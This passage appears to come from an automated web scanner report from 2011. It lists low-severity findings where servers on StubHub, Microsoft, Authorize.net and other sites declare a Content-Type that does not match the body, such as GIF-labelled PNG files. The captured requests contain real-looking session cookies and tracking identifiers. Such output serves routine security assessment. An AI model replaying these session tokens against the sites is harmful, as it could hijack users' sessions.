..............h.......(....... ...................................K...K...D~..K. ...r.D...L.&...s.L.&.M.(.M.(.C.#.D.$.D.$.M.,.M.-.D.).9}".C.).D.*.D.*.=}'.M.1.M.1.........C./.D./.C./.D.0.M.6.M.6.8.'.9.
...[SNIP]...

29.31. http://stubhub-www.baynote.net/baynote/tags3/common previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://stubhub-www.baynote.net
Path:	/baynote/tags3/common

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript;charset=ISO-8859-1

The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /baynote/tags3/common?customerId=stubhub&code=www&timeout=undefined&onFailure=undefined HTTP/1.1
Host: stubhub-www.baynote.net
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: BNServer
Cache-Control: public,max-age=27800,must-revalidate
Content-Type: text/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 18:36:23 GMT
Content-Length: 78212

baynote_globals.TagsURLPrefix="/baynote/tags3/";baynote_globals.CustomScript="customScript";baynote_globals.GuideSet="GuideSet";baynote_globals.ScriptWebapp="r";baynote_globals.Sc
...[SNIP]...

29.32. http://stubhub.tt.omtrdc.net/m2/stubhub/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://stubhub.tt.omtrdc.net
Path:	/m2/stubhub/mbox/standard

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/stubhub/mbox/standard?mboxHost=www.stubhub.com&mboxSession=1311100546147-926694&mboxPC=1308447436655-203098.17&mboxPage=1311100546147-926694&screenHeight=1200&screenWidth=1920&browserWidth=1065&browserHeight=723&browserTimeOffset=-300&colorDepth=32&mboxCount=1&pageType=BrowseTicketDetail&section=Concert%20tickets&mbox_channelId=1&mbox_genre_grand_parent_id=63914&mbox_genre_parent=602&mbox_event_id=906484&mbox=Global&mboxId=0&mboxTime=1311082546212&mboxURL=http%3A%2F%2Fwww.stubhub.com%2F%3Fticket_id%3D303237644%26GCID%3DC12289x970%26quantity_selected%3D2%26gtkw%3D-640518298&mboxReferrer=http%3A%2F%2Fbing.fansnap.com%2Fcheckout%2Findex%2F418563179%3Fctx%3Dc%253Dtix%253Bmt%253Dint%253Btsp%253D0%253Bdt%253D1%253Blpos%253D2%26ch%3Dbing%26quantity%3D2%26lp%3Dtrue%26poctx%3Drank%253D36%253BcrawlScore%253Dnull%253Bpop1%253D0.0374%253Bpop2%253D0.0374%253Bpop3%253D0.0374%253B%26afm%3D%26uet%3D-776896836%253A7925%253Apgstickets%257C%257Cbing%257Cmt%253Aint%253Bsz%253A1254%253Bid%253A389669&mboxVersion=40 HTTP/1.1
Host: stubhub.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

Summary

Severity:	Information
Confidence:	Firm
Host:	http://superpass.custhelp.com
Path:	/ci/browserSearch/desc/http%3A%2F%2Fsuperpass.custhelp.com%2Fapp%2Fanswers%2Flist%2Fkw%2F%7BsearchTerms%7D/Support+Home+Page+Search/Support+Home+Page+Search/images%2Ficons%2FSearch16.png

Issue detail

The response contains the following Content-type statement:

Content-Type: application/opensearchdescription+xml; charset="utf-8"

The response states that it contains script. However, it actually appears to contain XML.

Request

GET /ci/browserSearch/desc/http%3A%2F%2Fsuperpass.custhelp.com%2Fapp%2Fanswers%2Flist%2Fkw%2F%7BsearchTerms%7D/Support+Home+Page+Search/Support+Home+Page+Search/images%2Ficons%2FSearch16.png HTTP/1.1
Host: superpass.custhelp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cp_session=BX8FcQdzU3cGblQkVVUHfwNIATpQQ1ZtC3cAMw0tUigCcARoUXcNNAEiBw1WfgB1VmEGJ1V1AWkHbFFtXVRTKFEbAGsDT1ZwUlgETlZrDVoFYQUGBzlTJQYGVGtVPwcwA2YBJFA4Vj8LLwAl; __utma=152909883.1445521186.1311107156.1311107156.1311107156.1; __utmb=152909883.1.10.1311107156; __utmc=152909883; __utmz=152909883.1311107156.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:25:53 GMT
Server: Apache
P3P: policyref="http://superpass.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Expires: Thu, 18 Aug 2011 20:25:53 GMT
Content-Length: 813
RNT-Time: D=136838 t=1311107153075378
RNT-Machine: 17
X-Cnection: close
Content-Type: application/opensearchdescription+xml; charset="utf-8"

<?xml version="1.0" encoding="UTF-8"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/" xmlns:moz="http://www.mozilla.org/2006/browser/search/">
<ShortNa
...[SNIP]...

29.34. http://support.microsoft.com/library/images/support/en-AU/askcasey_Btn.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://support.microsoft.com
Path:	/library/images/support/en-AU/askcasey_Btn.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /library/images/support/en-AU/askcasey_Btn.gif HTTP/1.1
Host: support.microsoft.com
Proxy-Connection: keep-alive
Referer: http://support.microsoft.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; LBRN2DL=C; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; wedcsinc=2; ST_GN_EN-US=3_0_0; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311008316522:ss=1311004920058; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; .ASPXANONYMOUS=7JLoELl8zAEkAAAAOTI0OWQ2ZjEtNGRlYy00MjhjLWE2MzQtNjdjZWQ2MzA1NzQ2BAzHeg-AofAXSSoSDS0rsC5ORYQ1; gssSITE=gn; gssTHEME=gn; gssTOOLBAR=gn

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: image/gif
Last-Modified: Fri, 18 Feb 2011 07:14:17 GMT
Accept-Ranges: bytes
ETag: "e96662743bcfcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
ServerName: B07
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Date: Tue, 19 Jul 2011 15:19:22 GMT
Content-Length: 1564

.PNG
.
...IHDR...0.........w..y....sRGB.........gAMA......a.... pHYs..........o.d....IDATXG..kPTe...........BI.)"...0..l.i...4S...+(#.&*
..(.(.w\X.].E..WE...(.........e...y.....,.7.......s...9 ..aC=
...[SNIP]...

29.35. http://support.microsoft.com/library/images/support/en-AU/askcasey_topqa.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://support.microsoft.com
Path:	/library/images/support/en-AU/askcasey_topqa.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /library/images/support/en-AU/askcasey_topqa.gif HTTP/1.1
Host: support.microsoft.com
Proxy-Connection: keep-alive
Referer: http://support.microsoft.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; LBRN2DL=C; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; wedcsinc=2; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; .ASPXANONYMOUS=7JLoELl8zAEkAAAAOTI0OWQ2ZjEtNGRlYy00MjhjLWE2MzQtNjdjZWQ2MzA1NzQ2BAzHeg-AofAXSSoSDS0rsC5ORYQ1; gssSITE=gn; gssTHEME=gn; gssTOOLBAR=gn; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311077969178:ss=1311077969178; ST_GN_EN-US=4_0_0; fmsmemo=st=|13083

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: image/gif
Last-Modified: Mon, 14 Mar 2011 07:29:16 GMT
Accept-Ranges: bytes
ETag: "f3ab7f8619e2cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
ServerName: B07
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Date: Tue, 19 Jul 2011 15:19:22 GMT
Content-Length: 1038

.PNG
.
...IHDR.....................sRGB.........gAMA......a.... pHYs..........o.d....IDAThC.....A....|..@0.c1...x1.42.`3.X......XC.#cc.....o8S[U...3.S.twU.._..T.V...t.:....@G.#....t.:.....a..}2.

...[SNIP]...

29.36. https://support.microsoft.com/library/images/support/en-US/IE9_BG-img.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://support.microsoft.com
Path:	/library/images/support/en-US/IE9_BG-img.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /library/images/support/en-US/IE9_BG-img.jpg HTTP/1.1
Host: support.microsoft.com
Connection: keep-alive
Referer: https://support.microsoft.com/oas/default.aspx?gprid=assistance&st=1&wfxredirect=1&sd=gn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; LBRN2DL=C; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; 21661174-VID=16101514677756; 21661174-SKEY=5504769704751670663; HumanClickSiteContainerID_21661174=STANDALONE; tbcu_sc_prodact_master99838=0; ST_GN_EN-US=6_0_0; fmsmemo=st=|13083|13701|13703; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:31:35&Microsoft.NumberOfVisits=5&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:31:35&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=72&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; exitinfo=gp|1033|csa|en-us||L_174092; WFXSMCToken=1; MS0=e2380e0986da4be1b66f0ac9e9764ae5; .ASPXANONYMOUS=4Xrk9Lp8zAEkAAAAYjg5MmIyNDgtMGJjYS00OGQxLTgxZGQtNGNhNWM5NWViODEwBZINl8tYmsqgVQ-Ji-Ezy2ZuByE1; AuthKey=SMC; WFXLANG=en-us; sdninc=8; gssSITE=gn; gssTHEME=gn; gssTOOLBAR=gn; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078786002:ss=1311077969178; wedcsinc=5; fmshb=0,1311089586085

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: image/jpeg
Last-Modified: Mon, 11 Apr 2011 05:04:15 GMT
Accept-Ranges: bytes
ETag: "a298c7e75f8cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
ServerName: B07
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Date: Tue, 19 Jul 2011 15:33:00 GMT
Content-Length: 58266

.PNG
.
...IHDR...............7.....sRGB.........gAMA......a.... pHYs..........o.d.../IDATx^.}...W.4qww......n@HH............
........._u{..L.6.}.{/..Lr........S..S.N..&g..yExl}.:.4bf1....X.......e..
...[SNIP]...

29.37. http://verify.authorize.net/anetseal/images/secure90x72.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://verify.authorize.net
Path:	/anetseal/images/secure90x72.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /anetseal/images/secure90x72.gif HTTP/1.1
Host: verify.authorize.net
Proxy-Connection: keep-alive
Referer: http://www.adminitrack.com/?gclid=COjL1IrNjaoCFQ495QodxUaNzg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 2894
Content-Type: image/gif
Last-Modified: Fri, 26 Mar 2010 17:33:22 GMT
Accept-Ranges: bytes
ETag: "0dd746eacdca1:130f"
Server: Microsoft-IIS/6.0
P3P: CP="NOI NID NAV"
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 14:20:32 GMT

.PNG
.
...IHDR...Z...H.....v.......tEXtSoftware.Adobe ImageReadyq.e<..
.IDATx...?.+G...G.G...pK...ED.S..#DG..P..FQ:#.D.8....'BH....H.n...".E..... ..?.....w..]..{o.H#..g..3.<...;s...{O...S...zh...|g.
...[SNIP]...

29.38. http://video.msn.com/services/user/info previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://video.msn.com
Path:	/services/user/info

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

29.39. http://waypointlivingspaces.com/sites/default/files/waypoint_favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://waypointlivingspaces.com
Path:	/sites/default/files/waypoint_favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /sites/default/files/waypoint_favicon.ico HTTP/1.1
Host: waypointlivingspaces.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: SESSe2d9d7ad8ae79606f307f1e56494fe09=p5hnf2vbssre64l1tg1gvd29q4

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:48:56 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 30 Nov 2010 16:08:00 GMT
ETag: "6530cd2-47c-64831800"
Accept-Ranges: bytes
Content-Length: 1148
Cache-Control: max-age=1209600
Expires: Tue, 02 Aug 2011 20:48:56 GMT
Connection: close
Content-Type: text/plain

............ .h.......(....... ..... ............................................ ...p.............TG...w.... .................................................PB.}E7.}F7..QD..nb.......................
...[SNIP]...

29.40. http://www.atlassian.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.atlassian.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.atlassian.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=5737F51AEFA9638FB922D6856A505242; __utma=80426056.1841877914.1311085237.1311085237.1311085237.1; __utmb=80426056.3.10.1311085237; __utmc=80426056; __utmz=80426056.1311085237.1.1.utmgclid=CLiIoYbNjaoCFcFo4AodkV0lxw|utmccn=(not%20set)|utmcmd=(not%20set); __utmv=80426056.|1=ft=google!cpc!!!not-set=1; selected_language=en

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:38 GMT
Accept-Ranges: bytes
ETag: W/"3638-1259721205000"
Last-Modified: Wed, 02 Dec 2009 02:33:25 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 3638

..............h...&... ..............(....... ...........@.............................g.t9......pRB.>...........[9#..jC.Y*..uJ#......kZ...........|..Z4.l;..P,..1...P...iJ5...v.....bB,......mQ.zZC.b1
...[SNIP]...

29.41. http://www.cesal.ro/js/globalizationro-RO.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.cesal.ro
Path:	/js/globalizationro-RO.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /js/globalizationro-RO.js HTTP/1.1
Host: www.cesal.ro
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.cesal.ro/
Cookie: ASP.NET_SessionId=zwbryr55ojujwp55qkk40245

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 27 Jan 2011 11:33:58 GMT
Accept-Ranges: bytes
ETag: "41b02b1616becb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 18:41:33 GMT
Content-Length: 22938

.././. .J.S.c.r.i.p.t. .F.i.l.e..
.f.u.n.c.t.i.o.n. .g.e.t.J.S.P.H.(.p.h.). .{..
.    .v.a.r. .t.;..
.    .s.w.i.t.c.h. .(.p.h.). .{..
.    . . . . .c.a.s.e. .".C.o.n.t.a.c.t._.S.e.l.e.c.t.a.t.i.D.e.s.t.i.
...[SNIP]...

29.42. http://www.factset.com/files/xmlfeeds/current.fds previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.factset.com
Path:	/files/xmlfeeds/current.fds

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /files/xmlfeeds/current.fds?rand=931 HTTP/1.1
Host: www.factset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: application/json, text/javascript, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://www.factset.com/
Cookie: __utma=70632967.167886563.1311085595.1311085595.1311085595.1; __utmb=70632967; __utmc=70632967; __utmz=70632967.1311085595.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:26:29 GMT
Server: Apache
Last-Modified: Tue, 19 Jul 2011 10:00:01 GMT
ETag: "14c007-136-4a8692dd7ea40"
Accept-Ranges: bytes
Content-Length: 310
Connection: close
Content-Type: text/plain; charset=UTF-8

{"img_src":"/files/xmlfeeds/promo_images/Product_Promo_INVESTMENT_MANAGERS.PNG","alt":"Tour FactSet's solutions for Investment Managers. Enhance your entire investment process, including equity analys
...[SNIP]...

29.43. http://www.fansnap.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.fansnap.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.fansnap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ver=1; vid=256; tvid=1342567440282625; _fancat_session=BAh7CzoPc2Vzc2lvbl9pZCIlMjZjYjcyMzdmODk2MWE0MWUxZjgwNjE1NjE4NWYyYjU6C3NyY19pZGkCAQE6B2xwSSIcaHR0cDovL3d3dy5mYW5zbmFwLmNvbS8GOgZFRjoRdG1wX3Zpc2l0X2lkaQQoXWQfOghsb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQAs6Emxhc3RfYWNjZXNzZWRJdToJVGltZQ1y2huASsdhrgY6C29mZnNldGn%2BkJ0%3D--a4e7d50e911fa2aa00fa78b6813230ff63be4d43; POOLID=B; __utma=19633071.1263508421.1311101027.1311101027.1311101027.1; __utmb=19633071; __utmc=19633071; __utmz=19633071.1311101027.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:43:45 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 03 Sep 2008 05:44:59 GMT
ETag: "9d09aa-1536-563d8cc0"
Accept-Ranges: bytes
Content-Length: 5430
Connection: close
Content-Type: text/plain; charset=UTF-8

...... .... .....&......... .h.......(... ...@..... .................................%.,.C.J.C.J.C.J.C.J.C.J.A.G.".(...................................................................................
...[SNIP]...

29.44. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.google.com
Path:	/search

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /search?sourceid=chrome&ie=UTF-8&q=Scrum HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
